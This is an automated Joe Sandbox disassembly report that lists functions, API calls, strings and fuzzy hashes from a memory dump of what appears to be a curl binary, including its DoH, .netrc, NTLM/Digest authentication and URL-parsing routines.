_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DCC55A
_mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DCC5DB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DCC5F1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DCC5FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DCC630
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DCC645

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$_mbschr_strdup$_mbsnbcpy
String ID:
API String ID: 698015193-0
Opcode ID: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
Instruction ID: a04aa0c84044bfdce9bca69c334ade73a537b94502aaa28b775f0b404c9d1bff
Opcode Fuzzy Hash: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
Instruction Fuzzy Hash: B9415E21A19B4285EB15EF12A844678B7A4AF89BD1F595935CE6E073D0EFBCF081C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE2610 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 263networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF7F1DE2910

Strings

bad error code, xrefs: 00007FF7F1DE2772
DoH: %s type %s for %s, xrefs: 00007FF7F1DE2795
Could not DoH-resolve: %s, xrefs: 00007FF7F1DE2676
AAAA, xrefs: 00007FF7F1DE2787
DoH Host name: %s, xrefs: 00007FF7F1DE27DD

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: htons
String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
API String ID: 4207154920-4260076447
Opcode ID: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
Instruction ID: 328efcab7a3315a403971aedc042ec2e991018aba9d3ef2357c84b983860c413
Opcode Fuzzy Hash: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
Instruction Fuzzy Hash: DFC1D172A08A8186EB14EF15E4406AEB3B4FB84B85F80813ADE6E477D4DFBCD544C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB9DBC Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DB9F0E
_scwprintf.LIBCMT ref: 00007FF7F1DB9F7B

Part of subcall function 00007FF7F1DD0804: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00010A0007FFFFBC,00000198,?,00000190,?,00000000,00000000,?,00007FF7F1DBA023), ref: 00007FF7F1DD0892
Part of subcall function 00007FF7F1DD0804: fgets.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DD08B3

Strings

HOME, xrefs: 00007FF7F1DB9EE5
%s%s_netrc, xrefs: 00007FF7F1DB9F74
Couldn't find host %s in the %s file; using defaults, xrefs: 00007FF7F1DBA13C
%s%s.netrc, xrefs: 00007FF7F1DB9F07

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf$fgetsfopen
String ID: %s%s.netrc$%s%s_netrc$Couldn't find host %s in the %s file; using defaults$HOME
API String ID: 2363167223-3314400472
Opcode ID: bb18ee0aaabf0a42b5b598fae93f6e3c6482430532e28f7d5a10b3aa84831cc3
Instruction ID: 2cf90aafff031e7f30d897ac4814d687f74bab7ed93602205dd22eb7746ea40a
Opcode Fuzzy Hash: bb18ee0aaabf0a42b5b598fae93f6e3c6482430532e28f7d5a10b3aa84831cc3
Instruction Fuzzy Hash: D9B15D25A09B8695EB59EF15E8502A9A3B0FF48BC5F844131DE6E077E5DFBCE410C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD9578 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DD9764
_scwprintf.LIBCMT ref: 00007FF7F1DD9828

Strings

%sAuthorization: NTLM %s, xrefs: 00007FF7F1DD975D, 00007FF7F1DD9821
Proxy-, xrefs: 00007FF7F1DD9747, 00007FF7F1DD980B
NTLM, xrefs: 00007FF7F1DD9584
HTTP, xrefs: 00007FF7F1DD9593

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: %sAuthorization: NTLM %s$HTTP$NTLM$Proxy-
API String ID: 1992661772-3948863929
Opcode ID: 3057447337bc7947ce81546a1208f78a363fc2215dd63e4f8c01a3ac91c1a0ee
Instruction ID: e6d41bbe3f01047d8c1313fa35447f2589bb358976b1c09c8ca333843d7c26d8
Opcode Fuzzy Hash: 3057447337bc7947ce81546a1208f78a363fc2215dd63e4f8c01a3ac91c1a0ee
Instruction Fuzzy Hash: CB91BE32A08B4685EB04EF65E8506E9B7B4FB48B88F840036DE1D47798DFBDD545C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD14B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172COMMON

Download Yara Rule

Strings

STARTTLS denied, xrefs: 00007FF7F1DD16D3
Authentication cancelled, xrefs: 00007FF7F1DD16A0
PASS %s, xrefs: 00007FF7F1DD15DC
Authentication failed: %d, xrefs: 00007FF7F1DD1618
Access denied. %c, xrefs: 00007FF7F1DD15A1, 00007FF7F1DD15C2

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: Access denied. %c$Authentication cancelled$Authentication failed: %d$PASS %s$STARTTLS denied
API String ID: 0-2817885744
Opcode ID: ee4743e4ef2d11664396d9aed294599e35e50b8bfabc09a92b6a42d5e451a3d4
Instruction ID: 74df4597acab7231cf4375aed5b2115f5d6a7f90aa60f6ead90584227e7b591b
Opcode Fuzzy Hash: ee4743e4ef2d11664396d9aed294599e35e50b8bfabc09a92b6a42d5e451a3d4
Instruction Fuzzy Hash: 17718221E1C64395EF64BA2990443B9B3B9EF81780FD84131D92E476E9CFACF495C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBA2D0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DBA395
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DBA444

Strings

Invalid IPv6 address format, xrefs: 00007FF7F1DBA405
%25, xrefs: 00007FF7F1DBA38B
Please URL encode %% as %%25, see RFC 6874., xrefs: 00007FF7F1DBA39F
No valid port number in connect to host string (%s), xrefs: 00007FF7F1DBA468

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncmpstrtol
String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
API String ID: 826613874-4202423297
Opcode ID: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
Instruction ID: c43df3154ab63da09d2e7195d51cc272f8179e2438b170a314753035205a322a
Opcode Fuzzy Hash: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
Instruction Fuzzy Hash: E151E122E0D68664EB19EF1994541B8A7B1AF06B80FC44032C97F073D5DFEDE44AD3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D92DF4 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 152stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92E8F
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D92EAE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D92ED0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92F7E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92FA3

Strings

|<>"?*, xrefs: 00007FF7F1D92F0D
\\?\, xrefs: 00007FF7F1D92EC6

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$mallocstrncmpstrncpy
String ID: \\?\$|<>"?*
API String ID: 2141947759-3264285191
Opcode ID: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
Instruction ID: 9dbe94152cba590a320ebdb65eceb2472516d4de4ac59ada112152935eb263d2
Opcode Fuzzy Hash: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
Instruction Fuzzy Hash: 8151A122E0C78345FB666E16A940339E6B0AF45B94FC88138DE7D066D5DFFCE44283A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA8CD4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151stringCOMMON

Download Yara Rule

APIs

strspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000200,00000230,00007FF7F1DAA7F7), ref: 00007FF7F1DA8D41
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000200,00000230,00007FF7F1DAA7F7), ref: 00007FF7F1DA8D7A
inet_pton.WS2_32 ref: 00007FF7F1DA8E20
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00000000,00000001,00000000,00000000,00000200,00000230,00007FF7F1DAA7F7), ref: 00007FF7F1DA8EC9

Strings

/:#?!@, xrefs: 00007FF7F1DA8EBF
0123456789abcdefABCDEF:., xrefs: 00007FF7F1DA8D37

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: inet_ptonstrcspnstrncmpstrspn
String ID: /:#?!@$0123456789abcdefABCDEF:.
API String ID: 3548342379-4134865206
Opcode ID: bb44e831456dfa347d751db6e0baa9830d5133fbc23f8f1b71ac9e1147d56e42
Instruction ID: f825d015b3b02191798cb042aceab69af688ec6c597d2bef90b10c6ba9285180
Opcode Fuzzy Hash: bb44e831456dfa347d751db6e0baa9830d5133fbc23f8f1b71ac9e1147d56e42
Instruction Fuzzy Hash: B951E312A0C68684FF25EF269404279ABB0AB15B96F844131DFBE037D6DFBDE545C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD8CEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA3938: _open.API-MS-WIN-CRT-STDIO-L1-1-0(00007FF7F1D92184), ref: 00007FF7F1DA395A

_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F1DD8DE1
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DD8DED
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DD8E7C
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DD8EF0

Strings

Can't get the size of %s, xrefs: 00007FF7F1DD8DF2
Can't open %s for writing, xrefs: 00007FF7F1DD8D81

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _close$_fstat64_open_write
String ID: Can't get the size of %s$Can't open %s for writing
API String ID: 1186923665-3544860555
Opcode ID: 16d69abb4339eb507fe5fffd3098c74bcc41c51caf0da414e85ee2bb5c6d9b63
Instruction ID: 276b3a8067277207eb3749998fb2e6c9b29dd5ecd1240e0f43f31387969d45d1
Opcode Fuzzy Hash: 16d69abb4339eb507fe5fffd3098c74bcc41c51caf0da414e85ee2bb5c6d9b63
Instruction Fuzzy Hash: CE51B662B08B8281EB15EB26D4102B9B3B1FB44B94F984535DE6E477C9DFBDE40187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D938F4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93922
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93934
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93AA8

Strings

%s, xrefs: 00007FF7F1D939A1, 00007FF7F1D939E4, 00007FF7F1D93A24, 00007FF7F1D93A57
Failed to open %s to write libcurl code!, xrefs: 00007FF7F1D93948
%s, xrefs: 00007FF7F1D93972, 00007FF7F1D93A85

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_funcfclosefopen
String ID: %s$%s$Failed to open %s to write libcurl code!
API String ID: 4110152555-3591596397
Opcode ID: 9bb9e9f3ef58bb71e99986d0be79de901c3d8e6fbc98846f6b4c6d1ec7676dee
Instruction ID: 805cfcabb2eb5fe1a8eb0f0391c43ee69abb837ada17401fe6975cf3a5bcbef3
Opcode Fuzzy Hash: 9bb9e9f3ef58bb71e99986d0be79de901c3d8e6fbc98846f6b4c6d1ec7676dee
Instruction Fuzzy Hash: C7511B25A0DB82A1EB15AB12A6002B9E371AF05BC0FC85036CA7D177D9DFACF551C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9142C Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 117COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D914F2
fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D915B4

Strings

%s%s, %zu bytes (0x%zx), xrefs: 00007FF7F1D91465
%04zx: , xrefs: 00007FF7F1D914AE
%02x , xrefs: 00007FF7F1D914D7
, xrefs: 00007FF7F1D914EB

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: fputcfputs
String ID: $%02x $%04zx: $%s%s, %zu bytes (0x%zx)
API String ID: 269475090-2180745030
Opcode ID: e4f82768c1415edb8038a37158da27c1e033b0c683fe8c182233a3f2ef40f5af
Instruction ID: 679fb55afb9da53f482556d98fd84e9e6cefbf08db800b56bafe7bacc8c29745
Opcode Fuzzy Hash: e4f82768c1415edb8038a37158da27c1e033b0c683fe8c182233a3f2ef40f5af
Instruction Fuzzy Hash: C941A561F0869585EBA0AB15A944279E3B5BB41BA4FC84531CE7E037C9CFBCF045C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DB6414 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 115COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 00007FF7F1DB64FA
_scwprintf.LIBCMT ref: 00007FF7F1DB658E

Strings

Proxy-, xrefs: 00007FF7F1DB6572
Digest, xrefs: 00007FF7F1DB642C
%.*s, xrefs: 00007FF7F1DB64EE
%sAuthorization: Digest %s, xrefs: 00007FF7F1DB6583

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf
String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
API String ID: 1992661772-3976116069
Opcode ID: 5b09aa6f8acaafc9d2de3519143bf6550a570d9705a8426d8d1e31a313ac39ec
Instruction ID: dbb082e3521c8e1d1cb56ecad778662613b425fb4bc33d76bffae7855a4b3658
Opcode Fuzzy Hash: 5b09aa6f8acaafc9d2de3519143bf6550a570d9705a8426d8d1e31a313ac39ec
Instruction Fuzzy Hash: 0C519E32A08B4692EB14EF05E8402A9B7B4FB89F80F944035EE6E47794DFBDE555C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD1230 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 114COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD138A

Strings

SASL, xrefs: 00007FF7F1DD12A6
STLS not supported., xrefs: 00007FF7F1DD13AC
STLS, xrefs: 00007FF7F1DD1375
USER, xrefs: 00007FF7F1DD1287
STLS, xrefs: 00007FF7F1DD1272

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: SASL$STLS$STLS$STLS not supported.$USER
API String ID: 1488884202-1896462950
Opcode ID: 56932373f36a1059633d90e32581f86ed922a46cf3101ca90690ffdae4112696
Instruction ID: bf5e104d18e71e1abebb31c8fd9e9d9297e87972da5d6737c6655bd74183fca1
Opcode Fuzzy Hash: 56932373f36a1059633d90e32581f86ed922a46cf3101ca90690ffdae4112696
Instruction Fuzzy Hash: 2441F261E0C6C385FB21EA15A54427DFBBAEB05B90F950131C67D829C8EFBDF48183A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA29FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2A48
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2A6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2A7E
__swprintf_l.LIBCMT ref: 00007FF7F1DA2B0C

Strings

curl: (%d) %s, xrefs: 00007FF7F1DA2B19
%s in URL position %zu:%s%*s^, xrefs: 00007FF7F1DA2AED

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_lcallocfreemalloc
String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
API String ID: 1630718902-2317922172
Opcode ID: cd249fb2a47352c363024ae0d3021c38bc92ce0e3188c2f15876eedc7459387d
Instruction ID: c2a8897d8df595769e3093be49210e0406442cca584de43e02668e2f023d0448
Opcode Fuzzy Hash: cd249fb2a47352c363024ae0d3021c38bc92ce0e3188c2f15876eedc7459387d
Instruction Fuzzy Hash: 0631B52260974646F711EF12E8107BAB3B0BB45B94F944235DD6D077C6EFBCE4419350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9B2EE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9B2F9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B311
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B3C8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B3DB

Strings

Got more output options than URLs, xrefs: 00007FF7F1D9B411
out of memory, xrefs: 00007FF7F1D9B320

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$_strdup
String ID: Got more output options than URLs$out of memory
API String ID: 2653869212-1666425204
Opcode ID: 8388426265b27c7dbcea842a724ae09ae9d951d9cc84d8c183ac72d3789195c5
Instruction ID: 2b8b12fcde19a7e5056e6cd1315cce537c81367838a00a958c3b113b810e0467
Opcode Fuzzy Hash: 8388426265b27c7dbcea842a724ae09ae9d951d9cc84d8c183ac72d3789195c5
Instruction Fuzzy Hash: 4D41D12260AB8282E709EB21A1446BEB7B4FB45784FC14035CF6E073D5DFB8A065C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC8C7C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

Last-Modified, xrefs: 00007FF7F1DC8CFF
%s: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 00007FF7F1DC8DB3
If-Unmodified-Since, xrefs: 00007FF7F1DC8D0E
Invalid TIMEVALUE, xrefs: 00007FF7F1DC8CCA
If-Modified-Since, xrefs: 00007FF7F1DC8D1D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
